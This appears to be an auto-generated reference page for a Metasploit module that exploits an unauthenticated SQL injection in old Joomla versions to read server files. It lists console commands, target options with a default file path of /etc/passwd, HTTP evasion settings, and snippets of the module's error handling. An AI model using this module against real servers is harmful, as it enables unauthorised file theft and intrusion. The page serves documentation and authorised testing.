Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read - Metasploit


This page contains detailed information about how to use the auxiliary/gather/joomla_weblinks_sqli metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
Module: auxiliary/gather/joomla_weblinks_sqli
Source code: modules/auxiliary/gather/joomla_weblinks_sqli.rb
Disclosure date: 2014-03-02
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection which allows an attacker to access the database or read arbitrary files as the 'mysql' user. This module will only work if the mysql user Joomla is using to access the database has the LOAD_FILE permission.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/joomla_weblinks_sqli
msf auxiliary(joomla_weblinks_sqli) > show targets
    ... a list of targets ...
msf auxiliary(joomla_weblinks_sqli) > set TARGET target-id
msf auxiliary(joomla_weblinks_sqli) > show options
    ... show and set options ...
msf auxiliary(joomla_weblinks_sqli) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the gather/joomla_weblinks_sqli auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/joomla_weblinks_sqli

msf6 auxiliary(gather/joomla_weblinks_sqli) > show info

       Name: Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
     Module: auxiliary/gather/joomla_weblinks_sqli
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-03-02

Provided by:
  Brandon Perry <[email protected]>

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  CATEGORYID  0                yes       The category ID to use in the SQL injection
  FILEPATH    /etc/passwd      yes       The filepath to read on the server
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       80               yes       The target port (TCP)
  SSL         false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                yes       Base Joomla directory path
  VHOST                        no        HTTP server virtual host

Description:
  Joomla versions 3.2.2 and below are vulnerable to an unauthenticated 
  SQL injection which allows an attacker to access the database or 
  read arbitrary files as the 'mysql' user. This module will only work 
  if the mysql user Joomla is using to access the database has the 
  LOAD_FILE permission.

References:
  https://www.exploit-db.com/exploits/31459
  http://developer.joomla.org/security/578-20140301-core-sql-injection.html

Module Options


This is a complete list of options available in the gather/joomla_weblinks_sqli auxiliary module:

msf6 auxiliary(gather/joomla_weblinks_sqli) > show options

Module options (auxiliary/gather/joomla_weblinks_sqli):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CATEGORYID  0                yes       The category ID to use in the SQL injection
   FILEPATH    /etc/passwd      yes       The filepath to read on the server
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Base Joomla directory path
   VHOST                        no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/joomla_weblinks_sqli auxiliary module:

msf6 auxiliary(gather/joomla_weblinks_sqli) > show advanced

Module advanced options (auxiliary/gather/joomla_weblinks_sqli):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/joomla_weblinks_sqli module can do:

msf6 auxiliary(gather/joomla_weblinks_sqli) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/joomla_weblinks_sqli auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/joomla_weblinks_sqli) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Server did not respond in an expected way. Verify the IP address.


Here is a relevant code snippet related to the "Server did not respond in an expected way. Verify the IP address." error message:

90:	        'id' => payload
91:	      }
92:	    })
93:	
94:	    if !resp or !resp.body
95:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way. Verify the IP address.")
96:	    end
97:	
98:	    if resp.body =~ /404<\/span> Category not found/
99:	      fail_with(Failure::BadConfig, "The category ID was invalid. Please try again with a valid category ID")
100:	    end

The category ID was invalid. Please try again with a valid category ID


Here is a relevant code snippet related to the "The category ID was invalid. Please try again with a valid category ID" error message:

94:	    if !resp or !resp.body
95:	      fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way. Verify the IP address.")
96:	    end
97:	
98:	    if resp.body =~ /404<\/span> Category not found/
99:	      fail_with(Failure::BadConfig, "The category ID was invalid. Please try again with a valid category ID")
100:	    end
101:	
102:	    file = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
103:	
104:	    if !file

Either the file didn't exist or the server has been patched.


Here is a relevant code snippet related to the "Either the file didn't exist or the server has been patched." error message:

100:	    end
101:	
102:	    file = /#{front_marker}(.*)#{back_marker}/.match(resp.body)
103:	
104:	    if !file
105:	      fail_with(Failure::UnexpectedReply, "Either the file didn't exist or the server has been patched.")
106:	    end
107:	
108:	    file = file[1].gsub(front_marker, '').gsub(back_marker, '')
109:	    file = [file].pack("H*")
110:	

Either the file didn't exist or the database user does not have LOAD_FILE permissions


Here is a relevant code snippet related to the "Either the file didn't exist or the database user does not have LOAD_FILE permissions" error message:

107:	
108:	    file = file[1].gsub(front_marker, '').gsub(back_marker, '')
109:	    file = [file].pack("H*")
110:	
111:	    if file == '' or file == "\x00"
112:	      fail_with(Failure::UnexpectedReply, "Either the file didn't exist or the database user does not have LOAD_FILE permissions")
113:	    end
114:	
115:	    path = store_loot("joomla.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])
116:	
117:	    if path and path != ''

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Brandon Perry <bperry.volatile[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.